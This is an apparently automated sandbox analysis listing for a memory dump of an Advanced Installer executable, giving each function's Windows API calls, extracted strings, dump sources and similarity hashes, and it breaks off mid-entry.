Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

VariantClear.OLEAUT32 ref: 012A46D3

Strings

Ph/, xrefs: 012A464A, 012A46C9, 012A46D9
Ph/, xrefs: 012A4640
Ph/, xrefs: 012A4676

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$ClearHeapProcessVariant
String ID: Ph/$Ph/$Ph/
API String ID: 1301896575-2681059151
Opcode ID: 60c28bc0f45f3e1ec51ea81168fd3dd3ca66ea4f2b28faec078c828ee5e55344
Instruction ID: b1bb3d8355bf063664246175bdddb4193f0f478631a6f77b3b7cfecf570bd7c1
Opcode Fuzzy Hash: 60c28bc0f45f3e1ec51ea81168fd3dd3ca66ea4f2b28faec078c828ee5e55344
Instruction Fuzzy Hash: A211C676A14648EFDB15DF58D800BAABBF8FB09720F10466EFD25C7780DB75A9008B80

Uniqueness

Uniqueness Score: -1.00%

Function 01298770, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 012987C5
__Init_thread_footer.LIBCMT ref: 012987F7

Part of subcall function 013BBD10: EnterCriticalSection.KERNEL32(0147B82C,?,?,01298887,0147C45C,01413860), ref: 013BBD1A
Part of subcall function 013BBD10: LeaveCriticalSection.KERNEL32(0147B82C,?,01298887,0147C45C,01413860), ref: 013BBD4D
Part of subcall function 013BBD10: RtlWakeAllConditionVariable.NTDLL ref: 013BBDC4

__Init_thread_footer.LIBCMT ref: 01298882

Part of subcall function 013BBD5A: EnterCriticalSection.KERNEL32(0147B82C,?,?,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBD65
Part of subcall function 013BBD5A: LeaveCriticalSection.KERNEL32(0147B82C,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBDA2

Strings

Ph/, xrefs: 0129878A, 0129888F

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterInit_thread_footerLeave$ConditionHeapProcessVariableWake
String ID: Ph/
API String ID: 3269001908-906322640
Opcode ID: ef02a755c0ae2b83bbf090fa1a61de12e8689131b00138bc81930e06ce173c0a
Instruction ID: e7775e827bd03a8d8744eb282200996b3ada88c42ab9b4bf08ccd7fe1094bf52
Opcode Fuzzy Hash: ef02a755c0ae2b83bbf090fa1a61de12e8689131b00138bc81930e06ce173c0a
Instruction Fuzzy Hash: 83218BB1940646DFD720DF68E9857A877E4F705728F20063AD520A76A8DB7464048FA1

Uniqueness

Uniqueness Score: -1.00%

Function 013CC973, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 013CC9FD

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 4fb42c3813d0c40c11c2520e8378415650a6b9faf6446cd2b3b0538f930424fa
Instruction ID: 35b12d450a02952a0846a179f5f5dac076ed9c41e02276343c48a6f8cd483fd3
Opcode Fuzzy Hash: 4fb42c3813d0c40c11c2520e8378415650a6b9faf6446cd2b3b0538f930424fa
Instruction Fuzzy Hash: B1B168729002869FEB11CF6CC8907EEBFE5EF55B48F14916DE949AB241D6348D42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0129D070, Relevance: 6.3, APIs: 4, Instructions: 271memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 0129D13A
SysFreeString.OLEAUT32(00000000), ref: 0129D186
SysFreeString.OLEAUT32(00000000), ref: 0129D1A8
SysFreeString.OLEAUT32(00000000), ref: 0129D303

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0c8d77d9131076119b6aa791db4bc4d8413c0e713151befb262a8e55b7a52b08
Instruction ID: 10d12f2dc763d1221f7c030df69ade0ae6f758d790fd85f056fa14e65a2e941f
Opcode Fuzzy Hash: 0c8d77d9131076119b6aa791db4bc4d8413c0e713151befb262a8e55b7a52b08
Instruction Fuzzy Hash: 03A19F71A1020AAFDF15DFECC844FAEBBB8EF44724F144159EA15E7280D774AA05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012A2720, Relevance: 6.2, APIs: 4, Instructions: 194COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 012A27C0
SysFreeString.OLEAUT32(00000000), ref: 012A2801

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 4f92e1632ad3384b29729480ff011cc912888f40871d2e574fab2131810fddfb
Instruction ID: bd6ce7429eb5275bfa5ac8da5d3c497c92d628e4571492b1ca61beb04197a08c
Opcode Fuzzy Hash: 4f92e1632ad3384b29729480ff011cc912888f40871d2e574fab2131810fddfb
Instruction Fuzzy Hash: 09619372A0420AEFDB11CF58D944B9EBBB8FB48760F10466AFD1597390D776E910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0132A290, Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,80004005,80004005,?,?,?,00000000,013F7A9D,000000FF), ref: 0132A2A8
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,-00000001,?,?,80004005,80004005,?,?,?,00000000,013F7A9D,000000FF), ref: 0132A2DB
GetStdHandle.KERNEL32(000000F5,?,2F685009,00000000,013DBBA0,000000FF,?,80070057,?,-00000001,?,?,80004005,80004005,?,?), ref: 0132A346
SetConsoleTextAttribute.KERNEL32(00000000,?,2F685009,00000000,013DBBA0,000000FF,?,80070057,?,-00000001,?,?,80004005,80004005,?,?), ref: 0132A34D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AttributeConsoleHandleText
String ID:
API String ID: 3849414675-0
Opcode ID: 4e2ff71bd57eb798526ec1378218d2e0cc06fc07c6248b4372bca8ceafe78d28
Instruction ID: 035395584435c5593f24aa2632cd67f6209ea0448964d7ba7156df1d46bab45e
Opcode Fuzzy Hash: 4e2ff71bd57eb798526ec1378218d2e0cc06fc07c6248b4372bca8ceafe78d28
Instruction Fuzzy Hash: 4821D472704616AFD7109B5CDC88F6AF7A8EB86724F204329F625DB6D4CB7158018B90

Uniqueness

Uniqueness Score: -1.00%

Function 01365990, Relevance: 6.0, APIs: 4, Instructions: 44threadsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,?,2F685009,?,?,00000000,013DBAC0,000000FF,?,01365978,00000000,80004005,?,0147B454,?,?), ref: 013659C7
GetExitCodeThread.KERNEL32(00000001,80004005,?,?,00000000,013DBAC0,000000FF,?,01365978,00000000), ref: 013659E1
TerminateThread.KERNEL32(00000001,00000000,?,?,00000000,013DBAC0,000000FF,?,01365978,00000000), ref: 013659F9
CloseHandle.KERNEL32(00000001,?,?,00000000,013DBAC0,000000FF,?,01365978,00000000,80004005,?,0147B454,?,?,013480D9), ref: 01365A02

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
String ID:
API String ID: 3774109050-0
Opcode ID: a934d3da08e920ff2fc79144d88483203de44321611ced90d289bd6fdac7d401
Instruction ID: ccd6acd71ddaeb4288304a101b03807642886ed12820630d08b1ca36e991b9e2
Opcode Fuzzy Hash: a934d3da08e920ff2fc79144d88483203de44321611ced90d289bd6fdac7d401
Instruction Fuzzy Hash: 01019271900705DFD7318F58DD04BA6BBFCFB05764F00862DE926D26A4D770A800CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013BBDE2, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,013BBD7F,00000064), ref: 013BBE05
LeaveCriticalSection.KERNEL32(0147B82C,?,?,013BBD7F,00000064,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBE0F
WaitForSingleObjectEx.KERNEL32(?,00000000,?,013BBD7F,00000064,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBE20
EnterCriticalSection.KERNEL32(0147B82C,?,013BBD7F,00000064,?,01298816,0147C45C,2F685009,?,?,013DC01D,000000FF,?,0135FF2C,2F685009), ref: 013BBE27

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: fadec5750539b5629bbb0c58ccdb6efed597001cc6822e2614dc86191f810635
Instruction ID: acdb21e7e98934f769e329aac91163a5ac8bbc7e93e13a6d9801db0d23fe4a83
Opcode Fuzzy Hash: fadec5750539b5629bbb0c58ccdb6efed597001cc6822e2614dc86191f810635
Instruction Fuzzy Hash: 67E04836641124BFCA212F95FD099FE7F69EF4A761B060011FB095A138CB7119008FD0

Uniqueness

Uniqueness Score: -1.00%

Function 013648F0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

DeleteFileW.KERNEL32(?), ref: 013649CA
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 01364AFF

Part of subcall function 01353660: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,2F685009,00000001,73AFED80,00000000), ref: 013536AF
Part of subcall function 01353660: ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,2F685009,00000001,73AFED80,00000000), ref: 013536E5

Part of subcall function 01350CC0: LoadStringW.USER32(000000A1,?,00000514,2F685009), ref: 01350D16

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 0136497E

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$DeleteInit_thread_footer$CreateHeapLoadProcessReadString
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
API String ID: 3544038457-3685554107
Opcode ID: 4849337ebe3cd46082b02713e6260bdbc27eb757b043632a72a94405e250ddf1
Instruction ID: 11529f0687edd81f0e340a9c418d9ccd3dd9efffb96059c60d98bd7187ae4b69
Opcode Fuzzy Hash: 4849337ebe3cd46082b02713e6260bdbc27eb757b043632a72a94405e250ddf1
Instruction Fuzzy Hash: 5291B271A006099FDB00DF6CCC44B9EBBB9FF55328F188269E915DB2A5DB34D904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0135B460, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013FE37F,000000FF), ref: 0135B5E3
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,013FE37F,000000FF), ref: 0135B671

Strings

<< Advanced Installer (x86) Log >>, xrefs: 0135B54F

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
String ID: << Advanced Installer (x86) Log >>
API String ID: 3699736680-396061572
Opcode ID: a322eb49ee2ede679edb1105daa6c13fb718216c7ccda5b2cb57a0ae5040a02a
Instruction ID: 36b6968280243571fa31f9e48ca7bb6c35714a0690f92f9798553ddc9ffcd2b8
Opcode Fuzzy Hash: a322eb49ee2ede679edb1105daa6c13fb718216c7ccda5b2cb57a0ae5040a02a
Instruction Fuzzy Hash: 8961E07090168ADFDB11CF6CC584BAAFBF1EF55714F24829DD804AB3A1D774AA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131D260, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,2F685009,?), ref: 0131D301

Strings

\\?\UNC\, xrefs: 0131D32C, 0131D38E
\\?\, xrefs: 0131D3FB, 0131D427

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: 3eb0edce91547569d8287b7c95dbf1c880904e5a3454bd4a9c7076f8dd3a3b5f
Instruction ID: 5c42bfe22071a35a6f568254ad1eb694b0e2e6060aa83a3ba2acdfcd6fa78f58
Opcode Fuzzy Hash: 3eb0edce91547569d8287b7c95dbf1c880904e5a3454bd4a9c7076f8dd3a3b5f
Instruction Fuzzy Hash: A55103B0D102049BDB18DF9CD898BAEFBB5FF55308F50861DD81167295DBB1A908CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0135C850, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,2F685009,?,?,0147C630), ref: 0135C88F
CreateDirectoryW.KERNEL32(?,00000000,?,0147C630), ref: 0135C8F0

Strings

ADVINST_LOGS, xrefs: 0135C8C8

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS
API String ID: 2885754953-2492584244
Opcode ID: 15ba07f68eb8623c490ddb098b86b296e2c78e4349734975657f8c519ed01a79
Instruction ID: 5298f5cb47b78552b7dbd2a8582a139586e50f41a31d897f070f5108276aa6e7
Opcode Fuzzy Hash: 15ba07f68eb8623c490ddb098b86b296e2c78e4349734975657f8c519ed01a79
Instruction Fuzzy Hash: E051D27594035ACADB709F28C844BBAB7F8FF14B1CF1456AEDC4997291EB344981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012A5340, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,00000000,?,?,01420988,00000000,00000000,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033,2F685009), ref: 012A546B
CloseHandle.KERNEL32(?,2F685009), ref: 012A54A4

Strings

AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 012A53A8

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current
API String ID: 187904097-2431777889
Opcode ID: 7b94af943c4ad67abd8f258450f3ae4b553049d20a1dd092a6959bb3c9a9d4a3
Instruction ID: 9cd07cc0651bb99dbf10877d547cc38e5fa29f61a5f0b542ca2b6d6c27a87b89
Opcode Fuzzy Hash: 7b94af943c4ad67abd8f258450f3ae4b553049d20a1dd092a6959bb3c9a9d4a3
Instruction Fuzzy Hash: 1A413CB0D10259DBEF10DFA8C944BDEBBF4BF14308F508199D555B7290DBB85A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132C3C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,2F685009,0142DD98), ref: 0132C418
LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 0132C514

Part of subcall function 01321110: std::locale::_Init.LIBCPMT ref: 013211ED

Part of subcall function 01320780: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 01320855

Strings

Failed to get Windows error message [win32 error 0x, xrefs: 0132C436

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatFreeInitIos_base_dtorLocalMessagestd::ios_base::_std::locale::_
String ID: Failed to get Windows error message [win32 error 0x
API String ID: 1983821583-3373098694
Opcode ID: fe4cef955fee5b5684eb3fc9aaaed483673eaaab7c627afbf9661015d99d84f7
Instruction ID: 0bbbf10059f27422481234b78931b99483e60e8a5796b1d1926a2e2e7d8c1cc1
Opcode Fuzzy Hash: fe4cef955fee5b5684eb3fc9aaaed483673eaaab7c627afbf9661015d99d84f7
Instruction Fuzzy Hash: 3D414071A00219DFDB20DFA8C909BAFBBF9FF45718F104559E415EB290D7B4AA08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0129C190, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0131CA20: GetModuleFileNameW.KERNEL32(00000000,?,00000400,2F685009), ref: 0131CA69

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,014770B0,80000001,00000001,00000000,?,2F685009), ref: 0129C222
RegCloseKey.ADVAPI32(?,?,00002AF8,014770B0,80000001,00000001,00000000,?,2F685009), ref: 0129C26A

Strings

Ph/, xrefs: 0129C1BB, 0129C1DC

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileModuleNameQueryValue
String ID: Ph/
API String ID: 1288538307-906322640
Opcode ID: 82d013c5f94618007c23dda60cf211cf9e27206cdafa0d531bf1c0ba1f931258
Instruction ID: 2c626841c66918b7351af157a8878d6807c1f13c86360b0b035f1b9cfe0622f9
Opcode Fuzzy Hash: 82d013c5f94618007c23dda60cf211cf9e27206cdafa0d531bf1c0ba1f931258
Instruction Fuzzy Hash: 5D318D71E00249DBDF25DBA8CC54BEEBBB8AF14704F504168E51ABB1D0DB746A08CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0131FF80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0131FFAB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0132000E

Strings

bad locale name, xrefs: 01320031

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: e3199b4143720a02b47628f2be8af522129f720c65481b8d75ad7be3415b3dfc
Instruction ID: 601ffc9a2c3804dd09d7693b8ca29b23ca4350f5300f169240cc8236f5018d00
Opcode Fuzzy Hash: e3199b4143720a02b47628f2be8af522129f720c65481b8d75ad7be3415b3dfc
Instruction Fuzzy Hash: 6321F4B0905784DFE720CF6CC90474ABFE4AF15304F14869DE449C7B81D3B59A08C791

Uniqueness

Uniqueness Score: -1.00%

Function 013BDE1A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,Ph/,?,?,80004005,2F685009), ref: 013BDE7A

Strings

Ph/, xrefs: 013BDE25
Ph/, xrefs: 013BDE67, 013BDE6A

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID: Ph/$Ph/
API String ID: 3997070919-1915736154
Opcode ID: 300ce7ff9bfae168ba362b53639e149f9a9295f25d32a0dcc23e2edf3b0ee035
Instruction ID: e05d8d2939590615c7937daf9e2b5404677a6b0081b071f1509ffac6bdc76667
Opcode Fuzzy Hash: 300ce7ff9bfae168ba362b53639e149f9a9295f25d32a0dcc23e2edf3b0ee035
Instruction Fuzzy Hash: 9001A276900208ABD7019F9CD884BEEBFB8FF85708F154059EE09AB391E770A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01296740, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 01296745

Part of subcall function 013B9CD5: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013B9CE1

CloseHandle.KERNEL32(04EC4EC4,2F685009,?,00000000,013DBAA0,000000FF,?,map/set too long,01295B0F,?,?,2F685009), ref: 01296783

Strings

map/set too long, xrefs: 01296740

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID: map/set too long
API String ID: 2291168754-558153379
Opcode ID: 334195229a97edb3689c8c1f555e8251dd0fac840e0ea64e8577ee05e1bb5d90
Instruction ID: a651d09358ca942679352759a416e60ea31a52da8d2efd2ef666554b24536fa6
Opcode Fuzzy Hash: 334195229a97edb3689c8c1f555e8251dd0fac840e0ea64e8577ee05e1bb5d90
Instruction Fuzzy Hash: 44F0F6B1A54758ABE724CF5CDD40B8ABBECEF09A14F00452EFE15C3B80EB75A8008794

Uniqueness

Uniqueness Score: -1.00%

Function 012A46F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 012A46F9
SysAllocString.OLEAUT32(Ph/), ref: 012A470F

Strings

Ph/, xrefs: 012A4703

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocClearStringVariant
String ID: Ph/
API String ID: 1959693985-906322640
Opcode ID: 9fa09d2ecaca376a45b8a283a52ce90b15402cc9d754aa99ac31ae76b25d0639
Instruction ID: e28d2a2f125e9d467fb35d61ffb1c3229e79203e82fe48742c81c8e1cb13f6c9
Opcode Fuzzy Hash: 9fa09d2ecaca376a45b8a283a52ce90b15402cc9d754aa99ac31ae76b25d0639
Instruction Fuzzy Hash: 87F06534620397ABDB342F78C80472ABAD4EF01355F28DC2FE984D7224E7B5C4808749

Uniqueness

Uniqueness Score: -1.00%

Function 013B92B8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 012A1720: InitializeCriticalSectionAndSpinCount.KERNEL32(0147B460,00000000,2F685009,01290000,013DBBA0,000000FF,?,013B92E7,?,?,?,01295481), ref: 012A1745
Part of subcall function 012A1720: GetLastError.KERNEL32(?,013B92E7,?,?,?,01295481), ref: 012A174F

IsDebuggerPresent.KERNEL32(?,?,?,01295481), ref: 013B92EB
